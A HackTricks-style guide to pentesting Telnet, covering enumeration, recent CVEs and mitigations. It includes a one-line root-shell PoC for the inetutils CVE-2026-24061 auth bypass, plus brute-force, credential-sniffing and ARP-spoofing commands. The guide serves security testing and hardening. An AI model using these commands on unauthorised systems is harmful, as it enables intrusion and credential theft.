pentesting-telnet.md (10249B)
1 --- 2 title: "23 - Pentesting Telnet" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-telnet.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-telnet.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 23 - Pentesting Telnet 14 15 ## **Basic Information** 16 17 Telnet is a network protocol that gives users a UNsecure way to access a computer over a network. 18 19 **Default port:** 23 20 21 ```text 22 23/tcp open telnet 23 ``` 24 25 ## **Enumeration** 26 27 ### **Banner Grabbing** 28 29 ```bash 30 nc -vn <IP> 23 31 ``` 32 33 All the interesting enumeration can be performed by **nmap**: 34 35 ```bash 36 nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP> 37 ``` 38 39 The script `telnet-ntlm-info.nse` will obtain NTLM info (Windows versions). 40 41 From the [telnet RFC](https://datatracker.ietf.org/doc/html/rfc854): In the TELNET Protocol are various "**options**" that will be sanctioned and may be used with the "**DO, DON'T, WILL, WON'T**" structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc. 42 43 **I know it is possible to enumerate this options but I don't know how, so let me know if know how.** 44 45 ### **Enumerate Telnet Options / Features** 46 47 Telnet uses **IAC + DO/DONT/WILL/WONT** negotiations to enable options. You can observe supported options by capturing the initial negotiation and by probing for specific features. 48 49 **Nmap option/feature probes** 50 51 ```bash 52 # Detect support for the Telnet ENCRYPT option 53 nmap -p 23 --script telnet-encryption <IP> 54 55 # Enumerate Microsoft Telnet NTLM info (NetBIOS/DNS/OS build) 56 nmap -p 23 --script telnet-ntlm-info <IP> 57 58 # Brute-force via NSE (alternative to Hydra/Medusa) 59 nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP> 60 ``` 61 62 The `telnet-encryption` script checks whether the ENCRYPT option is supported; some implementations historically handled this option incorrectly and were vulnerable, but the script only checks support. 63 `telnet-ntlm-info` discloses NTLM metadata (NetBIOS/DNS/OS build) when Microsoft Telnet NTLM is enabled. 64 `telnet-brute` is an NSE brute-force auditor for Telnet. 65 66 ### [Brute force](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-hacking/brute-force.md#telnet) 67 68 ## Config file 69 70 ```bash 71 /etc/inetd.conf 72 /etc/xinetd.d/telnet 73 /etc/xinetd.d/stelnet 74 ``` 75 76 ## HackTricks Automatic Commands 77 78 ```text 79 Protocol_Name: Telnet #Protocol Abbreviation if there is one. 80 Port_Number: 23 #Comma separated if there is more than one. 81 Protocol_Description: Telnet #Protocol Abbreviation Spelled out 82 83 Entry_1: 84 Name: Notes 85 Description: Notes for t=Telnet 86 Note: | 87 wireshark to hear creds being passed 88 tcp.port == 23 and ip.addr != myip 89 90 https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html 91 92 Entry_2: 93 Name: Banner Grab 94 Description: Grab Telnet Banner 95 Command: nc -vn {IP} 23 96 97 Entry_3: 98 Name: Nmap with scripts 99 Description: Run nmap scripts for telnet 100 Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP} 101 102 Entry_4: 103 Name: consoleless mfs enumeration 104 Description: Telnet enumeration without the need to run msfconsole 105 Note: sourced from https://github.com/carlospolop/legion 106 Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit' 107 108 ``` 109 110 ### Recent Vulnerabilities (2022-2026) 111 112 * **CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860)**: Improper input validation in the telnet service allows remote attackers to log in using hard-coded credentials and inject OS commands; fixed by firmware **1.04B05** or later.<sup>[[6]](#references)</sup> 113 * **CVE-2023-40478 – NETGEAR RAX30**: Stack-based buffer overflow in the Telnet CLI `passwd` command enables network-adjacent code execution as root; authentication is required but can be bypassed.<sup>[[7]](#references)</sup> 114 * **CVE-2022-39028 – GNU inetutils telnetd**: A two-byte sequence (`0xff 0xf7` / `0xff 0xf8`) can trigger a NULL-pointer dereference in `telnetd`, and repeated crashes can lead inetd to disable the service (DoS).<sup>[[5]](#references)</sup> 115 116 Keep these CVEs in mind during vulnerability triage—if the target is running an un-patched firmware or legacy inetutils Telnet daemon you may have a straight-forward path to code-execution or a disruptive DoS. 117 118 ### CVE-2026-24061 — GNU Inetutils telnetd auth bypass (Critical) 119 120 **Primitive:** Telnet **NEW_ENVIRON** lets clients push environment variables during option negotiation; inetutils `telnetd` substitutes `%U` in its login template with `getenv("USER")` and passes it directly to `/usr/bin/login`, enabling **argv-level option injection** (no shell expansion). 121 **Root cause:** versions **1.9.3–2.7** expand `%U` without filtering, so a `USER` value beginning with `-` is parsed as a `login` flag. For example, `%U` becomes `-f root`, yielding `/usr/bin/login -h <hostname> "-f root"` and **skipping authentication** via `login -f`.<sup>[[1]](#references)[[3]](#references)</sup> 122 123 **Exploit flow:**<sup>[[1]](#references)</sup> 124 1. Connect to the Telnet service and negotiate **NEW_ENVIRON** to set `USER=-f root`. 125 2. `telnetd` builds the login argv including the attacker-controlled `%U` value. 126 3. `/usr/bin/login` interprets `-f root` as "pre-authenticated user root" and spawns a root shell. 127 128 **PoC**<sup>[[1]](#references)</sup> 129 130 ```bash 131 # Inject USER via NEW_ENVIRON and obtain a root shell 132 USER='-f root' telnet -a <ip> 133 ``` 134 135 **Patch note:** inetutils **2.7-2** introduces a `sanitize()` helper that rejects values starting with `-` or containing whitespace/metacharacters before substituting them into the login argv, blocking option injection.<sup>[[1]](#references)[[2]](#references)</sup> 136 **Detection/verification:** identify exposed daemons with `telnetd --version`, `dpkg -l | grep inetutils`, `systemctl status inetutils-telnetd`, or `netstat -tlnp | grep :23`.<sup>[[1]](#references)</sup> 137 138 **Mitigations** 139 140 * **Patch/upgrade** affected packages immediately (e.g., Debian fixes are in `2:2.4-2+deb12u2`, `2:2.6-3+deb13u1`, and `2:2.7-2`).<sup>[[4]](#references)</sup> 141 * **Disable Telnet** or restrict access to trusted management networks while patching.<sup>[[8]](#references)</sup> 142 143 ### Sniffing Credentials & Man-in-the-Middle 144 145 Telnet transmits everything, including credentials, in **clear-text**. Two quick ways to capture them: 146 147 ```bash 148 # Live capture with tcpdump (print ASCII) 149 sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)' 150 151 # Wireshark display filter 152 tcp.port == 23 && (telnet.data || telnet.option) 153 ``` 154 For active MITM, combine ARP spoofing (e.g. `arpspoof`/`ettercap`) with the same sniffing filters to harvest passwords on switched networks. 155 156 ### Automated Brute-force / Password Spraying 157 158 ```bash 159 # Hydra (stop at first valid login) 160 hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP> 161 162 # Ncrack (drop to interactive session on success) 163 ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP> 164 165 # Medusa (parallel hosts) 166 medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f 167 ``` 168 Most IoT botnets (Mirai variants) still scan port 23 with small default-credential dictionaries—mirroring that logic can quickly identify weak devices. 169 170 ### Exploitation & Post-Exploitation 171 172 Metasploit has several useful modules: 173 174 * `auxiliary/scanner/telnet/telnet_version` – banner & option enumeration. 175 * `auxiliary/scanner/telnet/brute_telnet` – multithreaded bruteforce. 176 * `auxiliary/scanner/telnet/telnet_encrypt_overflow` – RCE against vulnerable Solaris 9/10 Telnet (option ENCRYPT handling). 177 * `exploit/linux/mips/netgear_telnetenable` – enables telnet service with a crafted packet on many NETGEAR routers. 178 179 After a shell is obtained remember that **TTYs are usually dumb**; upgrade with `python -c 'import pty;pty.spawn("/bin/bash")'` or use the [HackTricks TTY tricks](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src//generic-hacking/reverse-shells/full-ttys.md). 180 181 ### Hardening & Detection (Blue team corner) 182 183 1. Prefer SSH and disable Telnet service completely. 184 2. If Telnet is required, bind it to management VLANs only, enforce ACLs and wrap the daemon with TCP wrappers (`/etc/hosts.allow`). 185 3. Replace legacy `telnetd` implementations with `ssl-telnet` or `telnetd-ssl` to add transport encryption, but **this only protects data-in-transit—password-guessing remains trivial**. 186 4. Monitor for outbound traffic to port 23; compromises often spawn reverse shells over Telnet to bypass strict-HTTP egress filters. 187 188 ## References 189 190 - [1] [OffSec – CVE-2026-24061 – GNU InetUtils telnetd Authentication Bypass Vulnerability](https://www.offsec.com/blog/cve-2026-24061/) 191 - [2] [Inetutils sanitize() fix (ccba9f748aa8d50a38d7748e2e60362edd6a32cc)](https://codeberg.org/inetutils/inetutils/commit/ccba9f748aa8d50a38d7748e2e60362edd6a32cc) 192 - [3] [NVD – CVE-2026-24061](https://nvd.nist.gov/vuln/detail/CVE-2026-24061) 193 - [4] [Debian Security Tracker – CVE-2026-24061](https://security-tracker.debian.org/tracker/CVE-2026-24061) 194 - [5] [NVD – CVE-2022-39028 inetutils `telnetd` DoS](https://nvd.nist.gov/vuln/detail/CVE-2022-39028) 195 - [6] [NVD – CVE-2024-45698 D-Link DIR-X4860 Telnet RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-45698) 196 - [7] [NVD – CVE-2023-40478 NETGEAR RAX30 Telnet Buffer Overflow](https://nvd.nist.gov/vuln/detail/CVE-2023-40478) 197 - [8] [Canadian Centre for Cyber Security Alert AL26-002 (CVE-2026-24061)](https://www.cyber.gc.ca/en/alerts-advisories/alert-AL26-002)